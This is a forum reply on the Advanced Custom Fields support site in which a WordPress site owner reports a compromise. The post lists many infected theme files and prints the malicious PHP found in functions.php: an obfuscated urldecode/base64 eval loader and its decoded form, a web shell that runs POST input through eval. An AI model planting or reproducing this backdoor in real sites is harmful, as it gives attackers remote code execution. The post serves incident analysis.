Home › Forums › General Issues › Bug or not in acf.php › Reply To: Bug or not in acf.php
Hello John,
I think that right and maybe it’s not a problem about your plugin (thinking because i just found yesterday “acf.php”
When i look for “$_POST[‘dd’]” in the directory, i have many more files modified more than 1 month…
I found these files :
wp-content/themes/yoo_balance_wp/comments.php
wp-content/themes/yoo_balance_wp/sidebar.php
wp-content/themes/yoo_balance_wp/changelog.php
wp-content/themes/yoo_balance_wp/404.php
wp-content/themes/yoo_balance_wp/footer.php
wp-content/themes/yoo_balance_wp/config.php
wp-content/themes/yoo_balance_wp/layouts/attachment.php
wp-content/themes/yoo_balance_wp/layouts/template.config.php
wp-content/themes/yoo_balance_wp/layouts/template.php
wp-content/themes/yoo_balance_wp/layouts/_post.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/module.php
wp-content/themes/yoo_balance_wp/layouts/single.php
wp-content/themes/yoo_balance_wp/header.php
wp-content/themes/yoo_balance_wp/index.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/cache/index.php
About :
/home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php
I found at the beginning
<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
That’s mean
<?php
$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
echo apiRequest();
function apiRequest(){
if(@$_GET['op'] == 'check')
{
return "connectjbmoveisok";
exit();
}
}
?>
So i think it’s not the good place, and it’s not your plugin.
Sorry for the time you lost !
I continue to analyse
Welcome to the Advanced Custom Fields community forum.
Browse through ideas, snippets of code, questions and answers between fellow ACF users
Helping others is a great way to earn karma, gain badges and help ACF development!
We use cookies to offer you a better browsing experience, analyze site traffic and personalize content. Read about how we use cookies and how you can control them in our Privacy Policy. If you continue to use this site, you consent to our use of cookies.